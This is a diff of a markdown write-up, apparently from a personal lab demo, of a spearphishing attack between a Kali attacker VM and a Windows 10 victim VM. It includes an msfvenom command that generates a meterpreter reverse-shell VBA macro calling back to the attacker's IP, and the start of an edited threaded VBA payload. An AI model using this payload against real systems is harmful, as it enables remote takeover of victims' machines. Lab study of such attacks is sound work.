EnricoPiccin02/Cybersecurity-Demo/home.md

 <br/>

 ## Threat Model
-The **Threat Model** necessary for this attack requires the adversary
+The **Threat Model** necessary for this attack requires the adversary to
-* knowing the e-mail address of the victim;
+* know the e-mail address of the victim;
-* being able to lure the victim to open the Spearphishing Attachment;
+* lure the victim to open the Spearphishing Attachment;
-* being able to establish a TCP connection with the victim's machine;
+* establish a TCP connection with the victim's machine;
-* acquiring enough privileges on the victim's system in order to execute exfiltration and encryption commands.
+* acquire enough privileges on the victim's system in order to execute exfiltration and encryption commands.

 <br/>

 ## Setup
-To perform the attack described above I used two Virtual Machines (referenced to as VMs in the following)
+To perform the attack described above I used two Virtual Machines (referenced to as VMs in the following):
-1. The attacker is associated with a Kali Linux VM, with IPv4 Address `192.168.56.102`;
+1. the **attacker** is associated with a **Kali Linux VM**, with IPv4 Address `192.168.56.102`;
-2. The victim runs a Windows 10 VM, with IPv4 Address `192.168.56.101`.
+2. the **victim** runs a **Windows 10 VM**, with IPv4 Address `192.168.56.101`.

-Both VMs have their network adapter configured as "Attached to NAT" in order to allow intra-communication withing the local network, but also inter-communication on the internet.
+Both VMs have their network adapter configured as "Attached to: **Host-only Adapter**" in order to just allow intra-communication within the local network.

 <br/>

 ## Preliminaries
-In order to create the Word document containing the malicious VBA Script, I have used `msfvenom` and a tool called [macro_pack](https://github.com/sevagas/macro_pack).
-Running the following command on Kali VM
+In order to create the Word document containing the malicious VBA Script, I have used `msfvenom` and a tool called [macro_pack](https://github.com/sevagas/macro_pack); in particular, I execute the following command on the Kali VM:
 ```
 msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.56.102 LPORT=4444 -f vba > reverse_shell_exploit.vba
 ```
-I am able to obtain a VBA Script that, when executed, will try to establish a TCP connection to the pair `<IPv4, Port> = <192.168.56.102, 4444>`.
+In this way, I am able to obtain a VBA Script that, when executed, will try to establish a TCP connection to the pair `<IPv4, Port> = <192.168.56.102, 4444>`.
 To make it more effective, I have edited it in order to launch a thread to do so:
 ```vb
 #If VBA7 Then
     Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As Long, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr